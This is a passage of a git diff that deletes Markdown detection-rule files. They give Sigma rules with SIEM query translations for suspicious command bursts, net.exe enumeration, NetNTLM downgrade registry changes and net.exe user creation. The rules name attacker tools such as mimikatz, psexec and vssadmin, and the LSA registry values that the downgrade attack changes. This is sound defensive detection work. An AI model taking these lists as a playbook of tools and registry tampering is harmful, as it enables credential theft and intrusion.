-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "arp.exe" -or $_.message -match "at.exe" -or $_.message -match "attrib.exe" -or $_.message -match "cscript.exe" -or $_.message -match "dsquery.exe" -or $_.message -match "hostname.exe" -or $_.message -match "ipconfig.exe" -or $_.message -match "mimikatz.exe" -or $_.message -match "nbtstat.exe" -or $_.message -match "net.exe" -or $_.message -match "netsh.exe" -or $_.message -match "nslookup.exe" -or $_.message -match "ping.exe" -or $_.message -match "quser.exe" -or $_.message -match "qwinsta.exe" -or $_.message -match "reg.exe" -or $_.message -match "runas.exe" -or $_.message -match "sc.exe" -or $_.message -match "schtasks.exe" -or $_.message -match "ssh.exe" -or $_.message -match "systeminfo.exe" -or $_.message -match "taskkill.exe" -or $_.message -match "telnet.exe" -or $_.message -match "tracert.exe" -or $_.message -match "wscript.exe" -or $_.message -match "xcopy.exe" -or $_.message -match "pscp.exe" -or $_.message -match "copy.exe" -or $_.message -match "robocopy.exe" -or $_.message -match "certutil.exe" -or $_.message -match "vssadmin.exe" -or $_.message -match "powershell.exe" -or $_.message -match "wevtutil.exe" -or $_.message -match "psexec.exe" -or $_.message -match "bcedit.exe" -or $_.message -match "wbadmin.exe" -or $_.message -match "icacls.exe" -or $_.message -match "diskpart.exe")) }  | group-object MachineName | where { $_.count -gt 5 } | select name,count | sort -desc
-```
-
-
-### es-qs
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/process_creation/win_multiple_suspicious_cli.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/61ab5496-748e-4818-a92f-de78e20fe7f1 <<EOF
-{
-  "metadata": {
-    "title": "Quick Execution of a Series of Suspicious Commands",
-    "description": "Detects multiple suspicious process in a limited timeframe",
-    "tags": [
-      "car.2013-04-002"
-    ],
-    "query": "winlog.event_data.CommandLine:(\"arp.exe\" OR \"at.exe\" OR \"attrib.exe\" OR \"cscript.exe\" OR \"dsquery.exe\" OR \"hostname.exe\" OR \"ipconfig.exe\" OR \"mimikatz.exe\" OR \"nbtstat.exe\" OR \"net.exe\" OR \"netsh.exe\" OR \"nslookup.exe\" OR \"ping.exe\" OR \"quser.exe\" OR \"qwinsta.exe\" OR \"reg.exe\" OR \"runas.exe\" OR \"sc.exe\" OR \"schtasks.exe\" OR \"ssh.exe\" OR \"systeminfo.exe\" OR \"taskkill.exe\" OR \"telnet.exe\" OR \"tracert.exe\" OR \"wscript.exe\" OR \"xcopy.exe\" OR \"pscp.exe\" OR \"copy.exe\" OR \"robocopy.exe\" OR \"certutil.exe\" OR \"vssadmin.exe\" OR \"powershell.exe\" OR \"wevtutil.exe\" OR \"psexec.exe\" OR \"bcedit.exe\" OR \"wbadmin.exe\" OR \"icacls.exe\" OR \"diskpart.exe\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "5m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine:(\"arp.exe\" OR \"at.exe\" OR \"attrib.exe\" OR \"cscript.exe\" OR \"dsquery.exe\" OR \"hostname.exe\" OR \"ipconfig.exe\" OR \"mimikatz.exe\" OR \"nbtstat.exe\" OR \"net.exe\" OR \"netsh.exe\" OR \"nslookup.exe\" OR \"ping.exe\" OR \"quser.exe\" OR \"qwinsta.exe\" OR \"reg.exe\" OR \"runas.exe\" OR \"sc.exe\" OR \"schtasks.exe\" OR \"ssh.exe\" OR \"systeminfo.exe\" OR \"taskkill.exe\" OR \"telnet.exe\" OR \"tracert.exe\" OR \"wscript.exe\" OR \"xcopy.exe\" OR \"pscp.exe\" OR \"copy.exe\" OR \"robocopy.exe\" OR \"certutil.exe\" OR \"vssadmin.exe\" OR \"powershell.exe\" OR \"wevtutil.exe\" OR \"psexec.exe\" OR \"bcedit.exe\" OR \"wbadmin.exe\" OR \"icacls.exe\" OR \"diskpart.exe\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          },
-          "aggs": {
-            "by": {
-              "terms": {
-                "field": "MachineName",
-                "size": 10,
-                "order": {
-                  "_count": "desc"
-                },
-                "min_doc_count": 6
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.aggregations.by.buckets.0.doc_count": {
-        "gt": 5
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Quick Execution of a Series of Suspicious Commands'",
-        "body": "Hits:\n{{#aggregations.by.buckets}}\n {{key}} {{doc_count}}\n{{/aggregations.by.buckets}}\n",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/process_creation/win_multiple_suspicious_cli.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### splunk
-    
-```
-(CommandLine="arp.exe" OR CommandLine="at.exe" OR CommandLine="attrib.exe" OR CommandLine="cscript.exe" OR CommandLine="dsquery.exe" OR CommandLine="hostname.exe" OR CommandLine="ipconfig.exe" OR CommandLine="mimikatz.exe" OR CommandLine="nbtstat.exe" OR CommandLine="net.exe" OR CommandLine="netsh.exe" OR CommandLine="nslookup.exe" OR CommandLine="ping.exe" OR CommandLine="quser.exe" OR CommandLine="qwinsta.exe" OR CommandLine="reg.exe" OR CommandLine="runas.exe" OR CommandLine="sc.exe" OR CommandLine="schtasks.exe" OR CommandLine="ssh.exe" OR CommandLine="systeminfo.exe" OR CommandLine="taskkill.exe" OR CommandLine="telnet.exe" OR CommandLine="tracert.exe" OR CommandLine="wscript.exe" OR CommandLine="xcopy.exe" OR CommandLine="pscp.exe" OR CommandLine="copy.exe" OR CommandLine="robocopy.exe" OR CommandLine="certutil.exe" OR CommandLine="vssadmin.exe" OR CommandLine="powershell.exe" OR CommandLine="wevtutil.exe" OR CommandLine="psexec.exe" OR CommandLine="bcedit.exe" OR CommandLine="wbadmin.exe" OR CommandLine="icacls.exe" OR CommandLine="diskpart.exe") | eventstats count as val by MachineName| search val > 5
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["arp.exe", "at.exe", "attrib.exe", "cscript.exe", "dsquery.exe", "hostname.exe", "ipconfig.exe", "mimikatz.exe", "nbtstat.exe", "net.exe", "netsh.exe", "nslookup.exe", "ping.exe", "quser.exe", "qwinsta.exe", "reg.exe", "runas.exe", "sc.exe", "schtasks.exe", "ssh.exe", "systeminfo.exe", "taskkill.exe", "telnet.exe", "tracert.exe", "wscript.exe", "xcopy.exe", "pscp.exe", "copy.exe", "robocopy.exe", "certutil.exe", "vssadmin.exe", "powershell.exe", "wevtutil.exe", "psexec.exe", "bcedit.exe", "wbadmin.exe", "icacls.exe", "diskpart.exe"]) | chart count() as val by MachineName | search val > 5
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*arp\.exe|.*at\.exe|.*attrib\.exe|.*cscript\.exe|.*dsquery\.exe|.*hostname\.exe|.*ipconfig\.exe|.*mimikatz\.exe|.*nbtstat\.exe|.*net\.exe|.*netsh\.exe|.*nslookup\.exe|.*ping\.exe|.*quser\.exe|.*qwinsta\.exe|.*reg\.exe|.*runas\.exe|.*sc\.exe|.*schtasks\.exe|.*ssh\.exe|.*systeminfo\.exe|.*taskkill\.exe|.*telnet\.exe|.*tracert\.exe|.*wscript\.exe|.*xcopy\.exe|.*pscp\.exe|.*copy\.exe|.*robocopy\.exe|.*certutil\.exe|.*vssadmin\.exe|.*powershell\.exe|.*wevtutil\.exe|.*psexec\.exe|.*bcedit\.exe|.*wbadmin\.exe|.*icacls\.exe|.*diskpart\.exe)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_net_enum.md b/Atomic_Threat_Coverage/Detection_Rules/win_net_enum.md
deleted file mode 100644
index b088327..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_net_enum.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | Windows Network Enumeration       |
-|:-------------------------|:------------------|
-| **Description**          | Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1018: Remote System Discovery](https://attack.mitre.org/techniques/T1018)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1018: Remote System Discovery](../Triggers/T1018.md)</li></ul>  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Legitimate use of net.exe utility by legitimate user</li></ul>  |
-| **Development Status**   | stable |
-| **References**           | <ul><li>[https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html](https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html)</li><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.yaml)</li></ul>  |
-| **Author**               | Endgame, JHasenbusch (ported for oscd.community) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Windows Network Enumeration
-id: 62510e69-616b-4078-b371-847da438cc03
-status: stable
-description: Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool.
-references:
-    - https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.yaml
-author: Endgame, JHasenbusch (ported for oscd.community)
-date: 2018/10/30
-modified: 2019/11/11
-tags:
-    - attack.discovery
-    - attack.t1018
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: 
-            - '\net.exe'
-            - '\net1.exe'
-        CommandLine|contains: 'view'
-    filter:
-        CommandLine|contains: \\\
-    condition: selection and not filter
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - Legitimate use of net.exe utility by legitimate user
-level: low 
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and (($_.message -match "Image.*.*\\net.exe" -or $_.message -match "Image.*.*\\net1.exe") -and $_.message -match "CommandLine.*.*view.*") -and  -not ($_.message -match "CommandLine.*.*\\\\.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:(*\\net.exe OR *\\net1.exe) AND winlog.event_data.CommandLine.keyword:*view*) AND (NOT (winlog.event_data.CommandLine.keyword:*\\\\*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/62510e69-616b-4078-b371-847da438cc03 <<EOF
-{
-  "metadata": {
-    "title": "Windows Network Enumeration",
-    "description": "Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool.",
-    "tags": [
-      "attack.discovery",
-      "attack.t1018"
-    ],
-    "query": "((winlog.event_data.Image.keyword:(*\\\\net.exe OR *\\\\net1.exe) AND winlog.event_data.CommandLine.keyword:*view*) AND (NOT (winlog.event_data.CommandLine.keyword:*\\\\\\\\*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:(*\\\\net.exe OR *\\\\net1.exe) AND winlog.event_data.CommandLine.keyword:*view*) AND (NOT (winlog.event_data.CommandLine.keyword:*\\\\\\\\*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Windows Network Enumeration'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:(*\\net.exe *\\net1.exe) AND CommandLine.keyword:*view*) AND (NOT (CommandLine.keyword:*\\\\*)))
-```
-
-
-### splunk
-    
-```
-(((Image="*\\net.exe" OR Image="*\\net1.exe") CommandLine="*view*") NOT (CommandLine="*\\\\*")) | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image IN ["*\\net.exe", "*\\net1.exe"] CommandLine="*view*")  -(CommandLine="*\\\\*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*(?:.*.*\net\.exe|.*.*\net1\.exe))(?=.*.*view.*)))(?=.*(?!.*(?:.*(?=.*.*\\\\.*)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_net_ntlm_downgrade.md b/Atomic_Threat_Coverage/Detection_Rules/win_net_ntlm_downgrade.md
deleted file mode 100644
index bca735c..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_net_ntlm_downgrade.md
+++ /dev/null
@@ -1,273 +0,0 @@
-| Title                    | NetNTLM Downgrade Attack       |
-|:-------------------------|:------------------|
-| **Description**          | Detects post exploitation using NetNTLM downgrade attacks |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1212: Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks](https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: NetNTLM Downgrade Attack
-id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2
-description: Detects post exploitation using NetNTLM downgrade attacks
-references:
-    - https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks
-author: Florian Roth
-date: 2018/03/20
-tags:
-    - attack.credential_access
-    - attack.t1212
-detection:
-    condition: 1 of them
-falsepositives:
-    - Unknown
-level: critical
---- 
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection1:
-        EventID: 13
-        TargetObject: 
-            - '*SYSTEM\\*ControlSet*\Control\Lsa\lmcompatibilitylevel'
-            - '*SYSTEM\\*ControlSet*\Control\Lsa*\NtlmMinClientSec'
-            - '*SYSTEM\\*ControlSet*\Control\Lsa*\RestrictSendingNTLMTraffic'
----
-# Windows Security Eventlog: Process Creation with Full Command Line
-logsource:
-    product: windows
-    service: security
-    definition: 'Requirements: Audit Policy : Object Access > Audit Registry (Success)'
-detection:
-    selection2:
-        EventID: 4657
-        ObjectName: '\REGISTRY\MACHINE\SYSTEM\\*ControlSet*\Control\Lsa*'
-        ObjectValueName: 
-            - 'LmCompatibilityLevel'
-            - 'NtlmMinClientSec'
-            - 'RestrictSendingNTLMTraffic'
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "13" -and ($_.message -match "TargetObject.*.*SYSTEM\\.*ControlSet.*\\Control\\Lsa\\lmcompatibilitylevel" -or $_.message -match "TargetObject.*.*SYSTEM\\.*ControlSet.*\\Control\\Lsa.*\\NtlmMinClientSec" -or $_.message -match "TargetObject.*.*SYSTEM\\.*ControlSet.*\\Control\\Lsa.*\\RestrictSendingNTLMTraffic")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Security | where {($_.ID -eq "4657" -and $_.message -match "ObjectName.*\\REGISTRY\\MACHINE\\SYSTEM\\.*ControlSet.*\\Control\\Lsa.*" -and ($_.message -match "LmCompatibilityLevel" -or $_.message -match "NtlmMinClientSec" -or $_.message -match "RestrictSendingNTLMTraffic")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"13" AND winlog.event_data.TargetObject.keyword:(*SYSTEM\\*ControlSet*\\Control\\Lsa\\lmcompatibilitylevel OR *SYSTEM\\*ControlSet*\\Control\\Lsa*\\NtlmMinClientSec OR *SYSTEM\\*ControlSet*\\Control\\Lsa*\\RestrictSendingNTLMTraffic))
-(winlog.channel:"Security" AND winlog.event_id:"4657" AND winlog.event_data.ObjectName.keyword:\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Control\\Lsa* AND winlog.event_data.ObjectValueName:("LmCompatibilityLevel" OR "NtlmMinClientSec" OR "RestrictSendingNTLMTraffic"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d67572a0-e2ec-45d6-b8db-c100d14b8ef2 <<EOF
-{
-  "metadata": {
-    "title": "NetNTLM Downgrade Attack",
-    "description": "Detects post exploitation using NetNTLM downgrade attacks",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1212"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"13\" AND winlog.event_data.TargetObject.keyword:(*SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\lmcompatibilitylevel OR *SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa*\\\\NtlmMinClientSec OR *SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa*\\\\RestrictSendingNTLMTraffic))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"13\" AND winlog.event_data.TargetObject.keyword:(*SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\lmcompatibilitylevel OR *SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa*\\\\NtlmMinClientSec OR *SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa*\\\\RestrictSendingNTLMTraffic))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'NetNTLM Downgrade Attack'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d67572a0-e2ec-45d6-b8db-c100d14b8ef2-2 <<EOF
-{
-  "metadata": {
-    "title": "NetNTLM Downgrade Attack",
-    "description": "Detects post exploitation using NetNTLM downgrade attacks",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1212"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4657\" AND winlog.event_data.ObjectName.keyword:\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa* AND winlog.event_data.ObjectValueName:(\"LmCompatibilityLevel\" OR \"NtlmMinClientSec\" OR \"RestrictSendingNTLMTraffic\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4657\" AND winlog.event_data.ObjectName.keyword:\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa* AND winlog.event_data.ObjectValueName:(\"LmCompatibilityLevel\" OR \"NtlmMinClientSec\" OR \"RestrictSendingNTLMTraffic\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'NetNTLM Downgrade Attack'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"13" AND TargetObject.keyword:(*SYSTEM\\*ControlSet*\\Control\\Lsa\\lmcompatibilitylevel *SYSTEM\\*ControlSet*\\Control\\Lsa*\\NtlmMinClientSec *SYSTEM\\*ControlSet*\\Control\\Lsa*\\RestrictSendingNTLMTraffic))
-(EventID:"4657" AND ObjectName.keyword:\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Control\\Lsa* AND ObjectValueName:("LmCompatibilityLevel" "NtlmMinClientSec" "RestrictSendingNTLMTraffic"))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="13" (TargetObject="*SYSTEM\\*ControlSet*\\Control\\Lsa\\lmcompatibilitylevel" OR TargetObject="*SYSTEM\\*ControlSet*\\Control\\Lsa*\\NtlmMinClientSec" OR TargetObject="*SYSTEM\\*ControlSet*\\Control\\Lsa*\\RestrictSendingNTLMTraffic"))
-(source="WinEventLog:Security" EventCode="4657" ObjectName="\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Control\\Lsa*" (ObjectValueName="LmCompatibilityLevel" OR ObjectValueName="NtlmMinClientSec" OR ObjectValueName="RestrictSendingNTLMTraffic"))
-```
-
-
-### logpoint
-    
-```
-(event_id="13" TargetObject IN ["*SYSTEM\\*ControlSet*\\Control\\Lsa\\lmcompatibilitylevel", "*SYSTEM\\*ControlSet*\\Control\\Lsa*\\NtlmMinClientSec", "*SYSTEM\\*ControlSet*\\Control\\Lsa*\\RestrictSendingNTLMTraffic"])
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4657" ObjectName="\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Control\\Lsa*" ObjectValueName IN ["LmCompatibilityLevel", "NtlmMinClientSec", "RestrictSendingNTLMTraffic"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*13)(?=.*(?:.*.*SYSTEM\\.*ControlSet.*\Control\Lsa\lmcompatibilitylevel|.*.*SYSTEM\\.*ControlSet.*\Control\Lsa.*\NtlmMinClientSec|.*.*SYSTEM\\.*ControlSet.*\Control\Lsa.*\RestrictSendingNTLMTraffic)))'
-grep -P '^(?:.*(?=.*4657)(?=.*\REGISTRY\MACHINE\SYSTEM\\.*ControlSet.*\Control\Lsa.*)(?=.*(?:.*LmCompatibilityLevel|.*NtlmMinClientSec|.*RestrictSendingNTLMTraffic)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_net_user_add.md b/Atomic_Threat_Coverage/Detection_Rules/win_net_user_add.md
deleted file mode 100644
index a182c0d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_net_user_add.md
+++ /dev/null
@@ -1,186 +0,0 @@
-| Title                    | Net.exe User Account Creation       |
-|:-------------------------|:------------------|
-| **Description**          | Identifies creation of local users via the net.exe command |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1136: Create Account](https://attack.mitre.org/techniques/T1136)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legit user creation</li><li>Better use event ids for user creation rather than command line rules</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html](https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html)</li><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.yaml)</li></ul>  |
-| **Author**               | Endgame, JHasenbusch (adapted to sigma for oscd.community) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Net.exe User Account Creation
-id: cd219ff3-fa99-45d4-8380-a7d15116c6dc
-status: experimental
-description: Identifies creation of local users via the net.exe command
-references:
-    - https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.yaml
-author: Endgame, JHasenbusch (adapted to sigma for oscd.community)
-date: 2018/10/30
-modified: 2019/11/11
-tags:
-    - attack.persistence
-    - attack.credential_access
-    - attack.t1136
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: 
-            - '\net.exe'
-            - '\net1.exe'
-        CommandLine|contains|all: 
-            - 'user'
-            - 'add'
-    condition: selection
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - Legit user creation
-    - Better use event ids for user creation rather than command line rules
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\net.exe" -or $_.message -match "Image.*.*\\net1.exe") -and $_.message -match "CommandLine.*.*user.*" -and $_.message -match "CommandLine.*.*add.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\net.exe OR *\\net1.exe) AND winlog.event_data.CommandLine.keyword:*user* AND winlog.event_data.CommandLine.keyword:*add*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/cd219ff3-fa99-45d4-8380-a7d15116c6dc <<EOF
-{
-  "metadata": {
-    "title": "Net.exe User Account Creation",
-    "description": "Identifies creation of local users via the net.exe command",
-    "tags": [
-      "attack.persistence",
-      "attack.credential_access",
-      "attack.t1136"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\net.exe OR *\\\\net1.exe) AND winlog.event_data.CommandLine.keyword:*user* AND winlog.event_data.CommandLine.keyword:*add*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
